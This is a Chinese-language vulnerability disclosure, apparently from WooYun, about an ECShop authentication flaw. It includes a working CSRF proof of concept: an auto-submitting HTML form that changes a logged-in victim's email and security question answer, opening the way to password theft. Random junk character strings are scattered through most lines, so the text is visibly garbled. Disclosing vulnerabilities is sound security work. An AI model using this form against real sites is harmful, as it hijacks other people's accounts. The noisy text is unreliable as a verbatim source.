简要描述:
3 j3 U" l# Z" M; Qecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现2 V$ }) d, ^+ x$ n/ T
' p7 e- B }" K) [7 ZDemo For:http://www.wooyun.org/bug.php?action=view&id=3955 C0 Y- d8 D0 h$ T3 s
+ \1 ^ M' M" p# A详细说明:
. H4 N" Y0 j6 j ~* M j! m! b利用csrf和xss可以突破官方所说的“障碍”; N0 [# w h6 \1 Y1 X
xss版本已经有人说明# M4 j9 K; x$ n6 @( w o; I
这里给出csrf版本8 X5 ~ q/ z. P
' o" o- l8 v. |0 V9 i
漏洞证明:; u" o% J" z+ H
<html>1 z# I# V- N- Q6 {
<body>
7 [% c a. j& q2 J8 O" L0 T<form action="http://www.wooyun.org/ecshop/user.php" method="POST">; R- v& K9 O" {/ r5 m/ e: Y
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
) ~8 F+ ~4 E& O7 m Q0 g<INPUT TYPE="text" NAME="act" value="act_edit_profile">* r. n% R. k- G a' b
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
2 _1 w2 c7 F8 }, }; H3 t<INPUT TYPE="text" NAME="passwd_answer" value="exploit">. |; m4 z) j8 [- K3 |2 R7 B
</body>& ]0 u" H c! y9 O( f3 }9 C
<script>4 e0 W% B( d- q9 f
document.forms[0].submit();
: ?* G4 W* R, k0 D5 u5 V$ k; z</script>, F6 q' a, {* Z& N J6 b
</html> ?' |& S& ^' H4 B/ I1 P
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失4 [# J4 g4 p/ O+ J
t6 P' I% u( F0 {( Q1 h |